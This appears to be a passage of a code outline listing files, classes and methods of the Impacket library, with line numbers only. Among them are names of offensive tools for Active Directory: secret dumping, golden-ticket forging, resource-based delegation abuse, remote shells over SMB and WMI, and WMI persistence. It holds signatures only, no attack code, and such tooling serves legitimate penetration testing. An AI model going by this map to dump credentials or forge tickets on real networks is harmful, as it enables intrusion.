method do_help (line 496) | def do_help(self, line):
method do_shell (line 506) | def do_shell(self, s):
method do_lget (line 510) | def do_lget(self, src_path):
method do_lput (line 527) | def do_lput(self, s):
method do_lcd (line 555) | def do_lcd(self, s):
method emptyline (line 562) | def emptyline(self):
method default (line 566) | def default(self, line):
method send_data (line 572) | def send_data(self, data, hideOutput = True):
class RemoteStdInPipe (line 580) | class RemoteStdInPipe(Pipes):
method __init__ (line 581) | def __init__(self, transport, pipe, permisssions, share=None):
method run (line 585) | def run(self):
FILE: examples/raiseChild.py
class RemComMessage (line 116) | class RemComMessage(Structure):
class RemComResponse (line 126) | class RemComResponse(Structure):
class PSEXEC (line 138) | class PSEXEC:
method __init__ (line 139) | def __init__(self, command, username, domain, smbConnection, TGS, copy...
method run (line 149) | def run(self, addr):
method openPipe (line 247) | def openPipe(self, s, tid, pipe, accessMask):
class Pipes (line 266) | class Pipes(Thread):
method __init__ (line 267) | def __init__(self, transport, pipe, permissions, TGS=None, share=None):
method connectPipe (line 281) | def connectPipe(self):
class RemoteStdOutPipe (line 298) | class RemoteStdOutPipe(Pipes):
method __init__ (line 299) | def __init__(self, transport, pipe, permisssions):
method run (line 302) | def run(self):
class RemoteStdErrPipe (line 325) | class RemoteStdErrPipe(Pipes):
method __init__ (line 326) | def __init__(self, transport, pipe, permisssions):
method run (line 329) | def run(self):
class RemoteShell (line 343) | class RemoteShell(cmd.Cmd):
method __init__ (line 344) | def __init__(self, server, port, credentials, tid, fid, TGS, share):
method connect_transferClient (line 357) | def connect_transferClient(self):
method do_help (line 363) | def do_help(self, line):
method do_shell (line 373) | def do_shell(self, s):
method do_get (line 377) | def do_get(self, src_path):
method do_put (line 394) | def do_put(self, s):
method do_lcd (line 423) | def do_lcd(self, s):
method emptyline (line 433) | def emptyline(self):
method default (line 437) | def default(self, line):
method send_data (line 443) | def send_data(self, data, hideOutput = True):
class RemoteStdInPipe (line 451) | class RemoteStdInPipe(Pipes):
method __init__ (line 452) | def __init__(self, transport, pipe, permisssions, TGS=None, share=None):
method run (line 455) | def run(self):
class RAISECHILD (line 460) | class RAISECHILD:
method __init__ (line 461) | def __init__(self, target = None, username = '', password = '', domain...
method getChildInfo (line 527) | def getChildInfo(self, creds):
method getMachineName (line 556) | def getMachineName(machineIP):
method getDNSMachineName (line 579) | def getDNSMachineName(machineIP):
method getParentSidAndTargetName (line 601) | def getParentSidAndTargetName(self, parentDC, creds, targetRID):
method __connectDrds (line 638) | def __connectDrds(self, domainName, creds):
method DRSCrackNames (line 710) | def DRSCrackNames(self, target, formatOffered=drsuapi.DS_NAME_FORMAT.D...
method __decryptSupplementalInfo (line 718) | def __decryptSupplementalInfo(self, record, prefixTable=None):
method __decryptHash (line 765) | def __decryptHash(self, record, prefixTable=None):
method DRSGetNCChanges (line 804) | def DRSGetNCChanges(self, userEntry, creds):
method getCredentials (line 850) | def getCredentials(self, userName, domain, creds = None):
method makeGolden (line 886) | def makeGolden(tgt, originalCipher, sessionKey, ntHash, aesKey, extraS...
method raiseUp (line 1111) | def raiseUp(self, childName, childCreds, parentName):
method exploit (line 1218) | def exploit(self):
FILE: examples/rbcd.py
function create_empty_sd (line 37) | def create_empty_sd():
function create_allow_ace (line 57) | def create_allow_ace(sid):
class RBCD (line 70) | class RBCD(object):
method __init__ (line 73) | def __init__(self, ldap_server, ldap_session, delegate_to):
method read (line 86) | def read(self):
method write (line 99) | def write(self, delegate_from):
method remove (line 144) | def remove(self, delegate_from):
method flush (line 184) | def flush(self):
method get_allowed_to_act (line 211) | def get_allowed_to_act(self):
method get_user_info (line 243) | def get_user_info(self, samname):
method get_sid_info (line 253) | def get_sid_info(self, sid):
function parse_args (line 263) | def parse_args():
function main (line 305) | def main():
FILE: examples/rdp_check.py
class TPKT (line 58) | class TPKT(Structure):
class TPDU (line 67) | class TPDU(Structure):
method __init__ (line 74) | def __init__(self, data = None):
class CR_TPDU (line 78) | class CR_TPDU(Structure):
class DATA_TPDU (line 88) | class DATA_TPDU(Structure):
method __init__ (line 94) | def __init__(self, data = None):
class RDP_NEG_REQ (line 99) | class RDP_NEG_REQ(CR_TPDU):
method __init__ (line 103) | def __init__(self,data=None):
class RDP_NEG_RSP (line 108) | class RDP_NEG_RSP(CR_TPDU):
class RDP_NEG_FAILURE (line 113) | class RDP_NEG_FAILURE(CR_TPDU):
class TSPasswordCreds (line 118) | class TSPasswordCreds(GSSAPI):
method __init__ (line 124) | def __init__(self, data=None):
method getData (line 128) | def getData(self):
class TSCredentials (line 141) | class TSCredentials(GSSAPI):
method __init__ (line 146) | def __init__(self, data=None):
method getData (line 150) | def getData(self):
class TSRequest (line 163) | class TSRequest(GSSAPI):
method __init__ (line 176) | def __init__(self, data=None):
method fromString (line 180) | def fromString(self, data = None):
method getData (line 247) | def getData(self):
class SPNEGOCipher (line 295) | class SPNEGOCipher:
method __init__ (line 296) | def __init__(self, flags, randomSessionKey):
method encrypt (line 319) | def encrypt(self, plain_data):
method decrypt (line 343) | def decrypt(self, answer):
function check_rdp (line 366) | def check_rdp(host, username, password, domain, hashes=None, ipv6=False):
FILE: examples/reg.py
class RemoteOperations (line 51) | class RemoteOperations:
method __init__ (line 52) | def __init__(self, smbConnection, doKerberos, kdcHost=None):
method getRRP (line 70) | def getRRP(self):
method __connectSvcCtl (line 73) | def __connectSvcCtl(self):
method connectWinReg (line 80) | def connectWinReg(self):
method __checkServiceStatus (line 87) | def __checkServiceStatus(self):
method enableRegistry (line 118) | def enableRegistry(self):
method __restore (line 123) | def __restore(self):
method finish (line 132) | def finish(self):
class RegHandler (line 140) | class RegHandler:
method __init__ (line 141) | def __init__(self, username, password, domain, options):
method connect (line 162) | def connect(self, remoteName, remoteHost):
method run (line 171) | def run(self, remoteName, remoteHost):
method triggerWinReg (line 207) | def triggerWinReg(self):
method save (line 218) | def save(self, dce, keyName):
method query (line 229) | def query(self, dce, keyName):
method add (line 259) | def add(self, dce, keyName, persistent):
method delete (line 338) | def delete(self, dce, keyName):
method __strip_root_key (line 443) | def __strip_root_key(self, dce, keyName):
method __print_key_values (line 463) | def __print_key_values(self, rpc, keyHandler):
method __print_all_subkeys_and_entries (line 480) | def __print_all_subkeys_and_entries(self, rpc, keyName, keyHandler, in...
method __parse_lp_data (line 505) | def __parse_lp_data(valueType, valueData):
FILE: examples/registry-read.py
function bootKey (line 34) | def bootKey(reg):
function getClass (line 50) | def getClass(reg, className):
function getValue (line 65) | def getValue(reg, keyValue):
function enumValues (line 79) | def enumValues(reg, searchKey):
function enumKey (line 101) | def enumKey(reg, searchKey, isRecursive, indent=' '):
function walk (line 117) | def walk(reg, keyName):
function main (line 121) | def main():
FILE: examples/regsecrets.py
class DumpSecrets (line 66) | class DumpSecrets:
method __init__ (line 67) | def __init__(self, remoteName, username='', password='', domain='', op...
method connect (line 93) | def connect(self):
method dump (line 101) | def dump(self):
method cleanup (line 165) | def cleanup(self):
FILE: examples/rpcdump.py
class RPCDump (line 38) | class RPCDump:
method __init__ (line 47) | def __init__(self, username = '', password = '', domain='', hashes = N...
method dump (line 58) | def dump(self, remoteName, remoteHost):
method __fetchList (line 154) | def __fetchList(self, rpctransport):
FILE: examples/rpcmap.py
class RPCMap (line 56) | class RPCMap():
method __init__ (line 57) | def __init__(self, stringbinding='', authLevel=6, bruteUUIDs=False, uu...
method get_rpc_transport (line 82) | def get_rpc_transport(self):
method set_transport_credentials (line 85) | def set_transport_credentials(self, username, password, domain='', has...
method set_rpc_credentials (line 95) | def set_rpc_credentials(self, username, password, domain='', hashes=No...
method set_smb_info (line 108) | def set_smb_info(self, smbhost=None, smbport=None):
method connect (line 115) | def connect(self):
method disconnect (line 119) | def disconnect(self):
method do (line 122) | def do(self):
method bruteforce_versions (line 163) | def bruteforce_versions(self, interface_uuid):
method bruteforce_opnums (line 194) | def bruteforce_opnums(self, binuuid):
method bruteforce_uuids (line 226) | def bruteforce_uuids(self):
method handle_discovered_tup (line 249) | def handle_discovered_tup(self, tup):
class SmartFormatter (line 278) | class SmartFormatter(argparse.HelpFormatter):
method _split_lines (line 279) | def _split_lines(self, text, width):
FILE: examples/sambaPipe.py
class PIPEDREAM (line 50) | class PIPEDREAM:
method __init__ (line 51) | def __init__(self, smbClient, options):
method isShareWritable (line 55) | def isShareWritable(self, shareName):
method findSuitableShare (line 73) | def findSuitableShare(self):
method uploadSoFile (line 88) | def uploadSoFile(self, shareName):
method create (line 97) | def create(self, treeId, fileName, desiredAccess, shareMode, creationO...
method openPipe (line 143) | def openPipe(self, sharePath, fileName):
method run (line 179) | def run(self):
FILE: examples/samrdump.py
class ListUsersException (line 38) | class ListUsersException(Exception):
class SAMRDump (line 41) | class SAMRDump:
method __init__ (line 42) | def __init__(self, username='', password='', domain='', hashes=None,
method getUnixTime (line 60) | def getUnixTime(t):
method dump (line 65) | def dump(self, remoteName, remoteHost):
method __fetchList (line 142) | def __fetchList(self, rpctransport):
FILE: examples/secretsdump.py
class DumpSecrets (line 76) | class DumpSecrets:
method __init__ (line 77) | def __init__(self, remoteName, username='', password='', domain='', op...
method connect (line 128) | def connect(self):
method ldapConnect (line 136) | def ldapConnect(self):
method dump (line 176) | def dump(self):
method cleanup (line 372) | def cleanup(self):
FILE: examples/services.py
class SVCCTL (line 40) | class SVCCTL:
method __init__ (line 42) | def __init__(self, username, password, domain, options, port=445):
method run (line 58) | def run(self, remoteName, remoteHost):
method doStuff (line 72) | def doStuff(self, rpctransport):
FILE: examples/smbclient.py
function main (line 33) | def main():
FILE: examples/smbexec.py
class SMBServer (line 64) | class SMBServer(Thread):
method __init__ (line 65) | def __init__(self):
method cleanup_server (line 69) | def cleanup_server(self):
method run (line 73) | def run(self):
method stop (line 112) | def stop(self):
class CMDEXEC (line 118) | class CMDEXEC:
method __init__ (line 119) | def __init__(self, username='', password='', domain='', hashes=None, a...
method run (line 143) | def run(self, remoteName, remoteHost):
class RemoteShell (line 175) | class RemoteShell(cmd.Cmd):
method __init__ (line 176) | def __init__(self, share, rpc, mode, serviceName, shell_type):
method finish (line 211) | def finish(self):
method do_shell (line 233) | def do_shell(self, s):
method do_exit (line 236) | def do_exit(self, s):
method do_EOF (line 239) | def do_EOF(self, s):
method emptyline (line 243) | def emptyline(self):
method do_cd (line 246) | def do_cd(self, s):
method do_CD (line 259) | def do_CD(self, s):
method default (line 262) | def default(self, line):
method get_output (line 266) | def get_output(self):
method execute_remote (line 279) | def execute_remote(self, data, shell_type='cmd'):
method send_data (line 306) | def send_data(self, data):
FILE: examples/sniff.py
class DecoderThread (line 40) | class DecoderThread(Thread):
method __init__ (line 41) | def __init__(self, pcapObj):
method run (line 54) | def run(self):
method packetHandler (line 59) | def packetHandler(self, hdr, data):
function getInterface (line 66) | def getInterface():
function main (line 91) | def main(filter):
FILE: examples/split.py
class Connection (line 37) | class Connection:
method __init__ (line 44) | def __init__(self, p1, p2):
method getFilename (line 53) | def getFilename(self):
method __cmp__ (line 59) | def __cmp__(self, other):
method __hash__ (line 66) | def __hash__(self):
class Decoder (line 71) | class Decoder:
method __init__ (line 72) | def __init__(self, pcapObj):
method start (line 85) | def start(self):
method packetHandler (line 90) | def packetHandler(self, hdr, data):
function main (line 129) | def main(filename):
FILE: examples/ticketConverter.py
function parse_args (line 40) | def parse_args():
function main (line 50) | def main():
function is_kirbi_file (line 83) | def is_kirbi_file(filename):
function is_ccache_file (line 89) | def is_ccache_file(filename):
function convert_kirbi_to_ccache (line 95) | def convert_kirbi_to_ccache(input_filename, output_filename):
function convert_ccache_to_kirbi (line 100) | def convert_ccache_to_kirbi(input_filename, output_filename):
function base64_decode_with_unwrap (line 105) | def base64_decode_with_unwrap(input_filename):
FILE: examples/ticketer.py
class TICKETER (line 92) | class TICKETER:
method __init__ (line 93) | def __init__(self, target, password, domain, options):
method getFileTime (line 113) | def getFileTime(t):
method getPadLength (line 119) | def getPadLength(data_length):
method getBlockLength (line 123) | def getBlockLength(data_length):
method loadKeysFromKeytab (line 126) | def loadKeysFromKeytab(self, filename):
method createBasicValidationInfo (line 137) | def createBasicValidationInfo(self):
method createBasicPac (line 231) | def createBasicPac(self, kdcRep):
method createUpnDnsPac (line 270) | def createUpnDnsPac(self, pacInfos):
method createAttributesInfoPac (line 312) | def createAttributesInfoPac(pacInfos):
method createRequestorInfoPac (line 319) | def createRequestorInfoPac(self, pacInfos):
method createBasicTicket (line 326) | def createBasicTicket(self):
method getKerberosS4U2SelfU2U (line 462) | def getKerberosS4U2SelfU2U(self):
method customizeTicket (line 597) | def customizeTicket(self, kdcRep, pacInfos):
method signEncryptTicket (line 869) | def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, ...
method saveTicket (line 1086) | def saveTicket(self, ticket, sessionKey):
method run (line 1097) | def run(self):
FILE: examples/tstool.py
class TSHandler (line 59) | class TSHandler:
method __init__ (line 60) | def __init__(self, username, password, domain, options):
method connect (line 76) | def connect(self, remoteName, remoteHost):
method run (line 86) | def run(self, remoteName, remoteHost):
method get_session_list (line 95) | def get_session_list(self):
method enumerate_sessions_config (line 115) | def enumerate_sessions_config(self):
method enumerate_sessions_info (line 134) | def enumerate_sessions_info(self):
method do_qwinsta (line 153) | def do_qwinsta(self):
method lookupSids (line 271) | def lookupSids(self):
method sidToUser (line 308) | def sidToUser(self, sid):
method do_tasklist (line 313) | def do_tasklist(self):
method do_taskkill (line 400) | def do_taskkill(self):
method do_tscon (line 431) | def do_tscon(self):
method do_tsdiscon (line 461) | def do_tsdiscon(self):
method do_logoff (line 480) | def do_logoff(self):
method do_shutdown (line 501) | def do_shutdown(self):
method do_msg (line 528) | def do_msg(self):
method do_shadow (line 545) | def do_shadow(self):
FILE: examples/wmiexec.py
class WMIEXEC (line 51) | class WMIEXEC:
method __init__ (line 52) | def __init__(self, command='', username='', password='', domain='', ha...
method run (line 71) | def run(self, addr, silentCommand=False):
class RemoteShell (line 123) | class RemoteShell(cmd.Cmd):
method __init__ (line 124) | def __init__(self, share, win32Process, smbConnection, shell_type, sil...
method do_shell (line 150) | def do_shell(self, s):
method do_help (line 153) | def do_help(self, line):
method do_lcd (line 162) | def do_lcd(self, s):
method do_lget (line 171) | def do_lget(self, src_path):
method do_lput (line 189) | def do_lput(self, s):
method do_exit (line 212) | def do_exit(self, s):
method do_EOF (line 215) | def do_EOF(self, s):
method emptyline (line 219) | def emptyline(self):
method do_cd (line 222) | def do_cd(self, s):
method default (line 236) | def default(self, line):
method get_output (line 256) | def get_output(self):
method execute_remote (line 286) | def execute_remote(self, data, shell_type='cmd'):
method send_data (line 301) | def send_data(self, data):
class AuthFileSyntaxError (line 307) | class AuthFileSyntaxError(Exception):
method __init__ (line 311) | def __init__(self, path, lineno, reason):
method __str__ (line 316) | def __str__(self):
function load_smbclient_auth_file (line 321) | def load_smbclient_auth_file(path):
FILE: examples/wmipersist.py
class WMIPERSISTENCE (line 66) | class WMIPERSISTENCE:
method __init__ (line 67) | def __init__(self, username='', password='', domain='', options=None):
method checkError (line 78) | def checkError(banner, resp):
method run (line 90) | def run(self, addr):
FILE: examples/wmiquery.py
class WMIQUERY (line 44) | class WMIQUERY(cmd.Cmd):
method __init__ (line 45) | def __init__(self, iWbemServices):
method do_help (line 51) | def do_help(self, line):
method do_shell (line 59) | def do_shell(self, s):
method do_describe (line 62) | def do_describe(self, sClass):
method do_lcd (line 76) | def do_lcd(self, s):
method printReply (line 82) | def printReply(self, iEnum):
method default (line 113) | def default(self, line):
method emptyline (line 124) | def emptyline(self):
method do_exit (line 127) | def do_exit(self, line):
FILE: impacket/Dot11Crypto.py
class RC4 (line 18) | class RC4():
method __init__ (line 19) | def __init__(self, key):
method encrypt (line 27) | def encrypt(self, data):
method decrypt (line 38) | def decrypt(self, data):
FILE: impacket/Dot11KeyManager.py
class KeyManager (line 18) | class KeyManager:
method __init__ (line 19) | def __init__(self):
method __get_bssid_hasheable_type (line 22) | def __get_bssid_hasheable_type(self, bssid):
method add_key (line 28) | def add_key(self, bssid, key):
method replace_key (line 36) | def replace_key(self, bssid, key):
method get_key (line 42) | def get_key(self, bssid):
method delete_key (line 49) | def delete_key(self, bssid):
FILE: impacket/ICMP6.py
class ICMP6 (line 19) | class ICMP6(Header):
method __init__ (line 127) | def __init__(self, buffer = None):
method get_header_size (line 132) | def get_header_size(self):
method get_ip_protocol_number (line 135) | def get_ip_protocol_number(self):
method __str__ (line 138) | def __str__(self):
method __get_message_description (line 151) | def __get_message_description(self):
method __get_code_description (line 154) | def __get_code_description(self):
method get_type (line 162) | def get_type(self):
method get_code (line 165) | def get_code(self):
method get_checksum (line 168) | def get_checksum(self):
method set_type (line 172) | def set_type(self, type):
method set_code (line 175) | def set_code(self, code):
method set_checksum (line 178) | def set_checksum(self, checksum):
method calculate_checksum (line 182) | def calculate_checksum(self):
method is_informational_message (line 199) | def is_informational_message(self):
method is_error_message (line 202) | def is_error_message(self):
method is_well_formed (line 205) | def is_well_formed(self):
method Echo_Request (line 223) | def Echo_Request(class_object, id, sequence_number, arbitrary_data = N...
method Echo_Reply (line 227) | def Echo_Reply(class_object, id, sequence_number, arbitrary_data = None):
method __build_echo_message (line 231) | def __build_echo_message(class_object, type, id, sequence_number, arbi...
method Destination_Unreachable (line 253) | def Destination_Unreachable(class_object, code, originating_packet_dat...
method Packet_Too_Big (line 258) | def Packet_Too_Big(class_object, MTU, originating_packet_data = None):
method Time_Exceeded (line 263) | def Time_Exceeded(class_object, code, originating_packet_data = None):
method Parameter_Problem (line 268) | def Parameter_Problem(class_object, code, pointer, originating_packet_...
method __build_error_message (line 273) | def __build_error_message(class_object, type, code, data, originating_...
method Neighbor_Solicitation (line 294) | def Neighbor_Solicitation(class_object, target_address):
method Neighbor_Advertisement (line 298) | def Neighbor_Advertisement(class_object, target_address):
method __build_neighbor_message (line 302) | def __build_neighbor_message(class_object, msg_type, target_address):
method get_target_address (line 325) | def get_target_address(self):
method set_target_address (line 328) | def set_target_address(self, target_address):
method get_neighbor_advertisement_flags (line 339) | def get_neighbor_advertisement_flags(self):
method set_neighbor_advertisement_flags (line 342) | def set_neighbor_advertisement_flags(self, flags):
method get_router_flag (line 345) | def get_router_flag(self):
method set_router_flag (line 348) | def set_router_flag(self, flag_value):
method get_solicited_flag (line 356) | def get_solicited_flag(self):
method set_solicited_flag (line 359) | def set_solicited_flag(self, flag_value):
method get_override_flag (line 367) | def get_override_flag(self):
method set_override_flag (line 370) | def set_override_flag(self, flag_value):
method Node_Information_Query (line 380) | def Node_Information_Query(class_object, code, payload = None):
method Node_Information_Reply (line 384) | def Node_Information_Reply(class_object, code, payload = None):
method __build_node_information_message (line 388) | def __build_node_information_message(class_object, type, code, payload...
method get_qtype (line 414) | def get_qtype(self):
method set_qtype (line 417) | def set_qtype(self, qtype):
method get_nonce (line 420) | def get_nonce(self):
method set_nonce (line 423) | def set_nonce(self, nonce):
method get_flags (line 433) | def get_flags(self):
method set_flags (line 436) | def set_flags(self, flags):
method get_flag_T (line 439) | def get_flag_T(self):
method set_flag_T (line 442) | def set_flag_T(self, flag_value):
method get_flag_A (line 450) | def get_flag_A(self):
method set_flag_A (line 453) | def set_flag_A(self, flag_value):
method get_flag_C (line 461) | def get_flag_C(self):
method set_flag_C (line 464) | def set_flag_C(self, flag_value):
method get_flag_L (line 472) | def get_flag_L(self):
method set_flag_L (line 475) | def set_flag_L(self, flag_value):
method get_flag_S (line 483) | def get_flag_S(self):
method set_flag_S (line 486) | def set_flag_S(self, flag_value):
method get_flag_G (line 494) | def get_flag_G(self):
method set_flag_G (line 497) | def set_flag_G(self, flag_value):
method set_node_information_data (line 505) | def set_node_information_data(self, data):
method get_note_information_data (line 510) | def get_note_information_data(self):
method get_echo_id (line 514) | def get_echo_id(self):
method get_echo_sequence_number (line 517) | def get_echo_sequence_number(self):
method get_echo_arbitrary_data (line 520) | def get_echo_arbitrary_data(self):
method get_mtu (line 523) | def get_mtu(self):
method get_parm_problem_pointer (line 526) | def get_parm_problem_pointer(self):
method get_originating_packet_data (line 529) | def get_originating_packet_data(self):
FILE: impacket/IP6.py
class IP6 (line 22) | class IP6(Header):
method __init__ (line 28) | def __init__(self, buffer = None):
method contains (line 34) | def contains(self, aHeader):
method get_header_size (line 39) | def get_header_size(self):
method __str__ (line 42) | def __str__(self):
method get_pseudo_header (line 62) | def get_pseudo_header(self):
method get_ip_v (line 91) | def get_ip_v(self):
method get_traffic_class (line 94) | def get_traffic_class(self):
method get_flow_label (line 97) | def get_flow_label(self):
method get_payload_length (line 100) | def get_payload_length(self):
method get_next_header (line 103) | def get_next_header(self):
method get_hop_limit (line 106) | def get_hop_limit(self):
method get_ip_src (line 109) | def get_ip_src(self):
method get_ip_dst (line 113) | def get_ip_dst(self):
method set_ip_v (line 118) | def set_ip_v(self, version):
method set_traffic_class (line 131) | def set_traffic_class(self, traffic_class):
method set_flow_label (line 140) | def set_flow_label(self, flow_label):
method set_payload_length (line 148) | def set_payload_length(self, payload_length):
method set_next_header (line 153) | def set_next_header(self, next_header):
method set_hop_limit (line 156) | def set_hop_limit(self, hop_limit):
method set_ip_src (line 159) | def set_ip_src(self, source_address):
method set_ip_dst (line 165) | def set_ip_dst(self, destination_address):
method get_protocol_version (line 171) | def get_protocol_version(self):
method get_source_address (line 175) | def get_source_address(self):
method get_destination_address (line 179) | def get_destination_address(self):
method set_protocol_version (line 183) | def set_protocol_version(self, version):
method set_source_address (line 187) | def set_source_address(self, source_address):
method set_destination_address (line 191) | def set_destination_address(self, destination_address):
FILE: impacket/IP6_Address.py
class IP6_Address (line 15) | class IP6_Address:
method __init__ (line 28) | def __init__(self, address):
method __from_string (line 40) | def __from_string(self, address):
method __from_bytes (line 76) | def __from_bytes(self, theBytes):
method as_string (line 83) | def as_string(self, compress_address = True, scoped_address = True):
method as_bytes (line 99) | def as_bytes(self):
method __str__ (line 102) | def __str__(self):
method get_scope_id (line 105) | def get_scope_id(self):
method get_unscoped_address (line 108) | def get_unscoped_address(self):
method is_multicast (line 113) | def is_multicast(self):
method is_unicast (line 116) | def is_unicast(self):
method is_link_local_unicast (line 119) | def is_link_local_unicast(self):
method is_site_local_unicast (line 122) | def is_site_local_unicast(self):
method is_unique_local_unicast (line 125) | def is_unique_local_unicast(self):
method get_human_readable_address_type (line 129) | def get_human_readable_address_type(self):
method __is_address_in_compressed_form (line 148) | def __is_address_in_compressed_form(self, address):
method __count_compressed_groups (line 163) | def __count_compressed_groups(self, address):
method __count_compression_marker (line 168) | def __count_compression_marker(self, address):
method __insert_leading_zeroes (line 172) | def __insert_leading_zeroes(self, address):
method __expand_compressed_address (line 185) | def __expand_compressed_address(self, address):
method __trim_longest_zero_chain (line 203) | def __trim_longest_zero_chain(self, address):
method __trim_leading_zeroes (line 230) | def __trim_leading_zeroes(self, theStr):
method is_a_valid_text_representation (line 244) | def is_a_valid_text_representation(cls, text_representation):
method __is_a_scoped_address (line 252) | def __is_a_scoped_address(self, text_representation):
FILE: impacket/IP6_Extension_Headers.py
class IP6_Extension_Header (line 16) | class IP6_Extension_Header(Header):
method __init__ (line 26) | def __init__(self, buffer = None):
method __str__ (line 34) | def __str__(self):
method load_header (line 53) | def load_header(self, buffer):
method reset (line 84) | def reset(self):
method get_header_type_value (line 88) | def get_header_type_value(cls):
method get_extension_headers (line 92) | def get_extension_headers(cls):
method get_decoder (line 107) | def get_decoder(cls):
method get_header_type (line 110) | def get_header_type(self):
method get_headers_field_size (line 113) | def get_headers_field_size(self):
method get_header_size (line 116) | def get_header_size(self):
method get_next_header (line 122) | def get_next_header(self):
method get_header_extension_length (line 125) | def get_header_extension_length(self):
method set_next_header (line 128) | def set_next_header(self, next_header):
method set_header_extension_length (line 131) | def set_header_extension_length(self, header_extension_length):
method add_option (line 134) | def add_option(self, option):
method get_options (line 137) | def get_options(self):
method get_packet (line 140) | def get_packet(self):
method contains (line 156) | def contains(self, aHeader):
method get_pseudo_header (line 161) | def get_pseudo_header(self):
class Extension_Option (line 166) | class Extension_Option(PacketBuffer):
method __init__ (line 170) | def __init__(self, option_type, size):
method __str__ (line 176) | def __str__(self):
method set_option_type (line 186) | def set_option_type(self, option_type):
method get_option_type (line 189) | def get_option_type(self):
method set_option_length (line 192) | def set_option_length(self, length):
method get_option_length (line 195) | def get_option_length(self):
method set_data (line 198) | def set_data(self, data):
method get_len (line 206) | def get_len(self):
class Option_PAD1 (line 209) | class Option_PAD1(Extension_Option):
method __init__ (line 213) | def __init__(self):
method get_len (line 216) | def get_len(self):
class Option_PADN (line 219) | class Option_PADN(Extension_Option):
method __init__ (line 223) | def __init__(self, padding_size):
class Basic_Extension_Header (line 230) | class Basic_Extension_Header(IP6_Extension_Header):
method __init__ (line 235) | def __init__(self, buffer = None):
method reset (line 239) | def reset(self):
method add_option (line 244) | def add_option(self, option):
method add_padding (line 253) | def add_padding(self):
class Hop_By_Hop (line 268) | class Hop_By_Hop(Basic_Extension_Header):
method get_decoder (line 273) | def get_decoder(self):
class Destination_Options (line 277) | class Destination_Options(Basic_Extension_Header):
method get_decoder (line 282) | def get_decoder(self):
class Routing_Options (line 286) | class Routing_Options(IP6_Extension_Header):
method reset (line 291) | def reset(self):
method __str__ (line 297) | def __str__(self):
method get_decoder (line 314) | def get_decoder(self):
method get_headers_field_size (line 318) | def get_headers_field_size(self):
method set_routing_type (line 321) | def set_routing_type(self, routing_type):
method get_routing_type (line 324) | def get_routing_type(self):
method set_segments_left (line 327) | def set_segments_left(self, segments_left):
method get_segments_left (line 330) | def get_segments_left(self):
FILE: impacket/ImpactDecoder.py
class Decoder (line 42) | class Decoder:
method decode (line 44) | def decode(self, aBuffer):
method set_decoded_protocol (line 47) | def set_decoded_protocol(self, protocol):
method get_protocol (line 50) | def get_protocol(self, aprotocol):
method __str__ (line 58) | def __str__(self):
class EthDecoder (line 69) | class EthDecoder(Decoder):
method __init__ (line 70) | def __init__(self):
method decode (line 73) | def decode(self, aBuffer):
class LinuxSLLDecoder (line 102) | class LinuxSLLDecoder(Decoder):
method __init__ (line 103) | def __init__(self):
method decode (line 106) | def decode(self, aBuffer):
class IPDecoder (line 126) | class IPDecoder(Decoder):
method __init__ (line 127) | def __init__(self):
method decode (line 130) | def decode(self, aBuffer):
class IP6MultiProtocolDecoder (line 159) | class IP6MultiProtocolDecoder(Decoder):
method __init__ (line 160) | def __init__(self, a_protocol_id):
method decode (line 163) | def decode(self, buffer):
class IP6Decoder (line 186) | class IP6Decoder(Decoder):
method __init__ (line 187) | def __init__(self):
method decode (line 190) | def decode(self, buffer):
class HopByHopDecoder (line 203) | class HopByHopDecoder(Decoder):
method __init__ (line 204) | def __init__(self):
method decode (line 207) | def decode(self, buffer):
class DestinationOptionsDecoder (line 219) | class DestinationOptionsDecoder(Decoder):
method __init__ (line 220) | def __init__(self):
method decode (line 223) | def decode(self, buffer):
class RoutingOptionsDecoder (line 235) | class RoutingOptionsDecoder(Decoder):
method __init__ (line 236) | def __init__(self):
method decode (line 239) | def decode(self, buffer):
class ICMP6Decoder (line 251) | class ICMP6Decoder(Decoder):
method __init__ (line 252) | def __init__(self):
method decode (line 255) | def decode(self, buffer):
class ARPDecoder (line 266) | class ARPDecoder(Decoder):
method __init__ (line 267) | def __init__(self):
method decode (line 270) | def decode(self, aBuffer):
class UDPDecoder (line 279) | class UDPDecoder(Decoder):
method __init__ (line 280) | def __init__(self):
method decode (line 283) | def decode(self, aBuffer):
class TCPDecoder (line 292) | class TCPDecoder(Decoder):
method __init__ (line 293) | def __init__(self):
method decode (line 296) | def decode(self, aBuffer):
class IGMPDecoder (line 305) | class IGMPDecoder(Decoder):
method __init__ (line 306) | def __init__(self):
method decode (line 308) | def decode(self, aBuffer):
class IPDecoderForICMP (line 317) | class IPDecoderForICMP(Decoder):
method __init__ (line 321) | def __init__(self):
method decode (line 324) | def decode(self, aBuffer):
class ICMPDecoder (line 337) | class ICMPDecoder(Decoder):
method __init__ (line 338) | def __init__(self):
method decode (line 341) | def decode(self, aBuffer):
class DataDecoder (line 354) | class DataDecoder(Decoder):
method decode (line 355) | def decode(self, aBuffer):
class BaseDot11Decoder (line 360) | class BaseDot11Decoder(Decoder):
method __init__ (line 361) | def __init__(self, key_manager=None):
method set_key_manager (line 364) | def set_key_manager(self, key_manager):
method find_key (line 367) | def find_key(self, bssid):
class RadioTapDecoder (line 374) | class RadioTapDecoder(BaseDot11Decoder):
method __init__ (line 375) | def __init__(self):
method decode (line 378) | def decode(self, aBuffer):
class Dot11Decoder (line 394) | class Dot11Decoder(BaseDot11Decoder):
method __init__ (line 395) | def __init__(self):
method FCS_at_end (line 399) | def FCS_at_end(self, fcs_at_end=True):
method decode (line 402) | def decode(self, aBuffer):
class Dot11ControlDecoder (line 427) | class Dot11ControlDecoder(BaseDot11Decoder):
method __init__ (line 428) | def __init__(self):
method FCS_at_end (line 432) | def FCS_at_end(self, fcs_at_end=True):
method decode (line 435) | def decode(self, aBuffer):
class Dot11ControlFrameCTSDecoder (line 465) | class Dot11ControlFrameCTSDecoder(BaseDot11Decoder):
method __init__ (line 466) | def __init__(self):
method decode (line 469) | def decode(self, aBuffer):
class Dot11ControlFrameACKDecoder (line 474) | class Dot11ControlFrameACKDecoder(BaseDot11Decoder):
method __init__ (line 475) | def __init__(self):
method decode (line 478) | def decode(self, aBuffer):
class Dot11ControlFrameRTSDecoder (line 483) | class Dot11ControlFrameRTSDecoder(BaseDot11Decoder):
method __init__ (line 484) | def __init__(self):
method decode (line 487) | def decode(self, aBuffer):
class Dot11ControlFramePSPollDecoder (line 492) | class Dot11ControlFramePSPollDecoder(BaseDot11Decoder):
method __init__ (line 493) | def __init__(self):
method decode (line 496) | def decode(self, aBuffer):
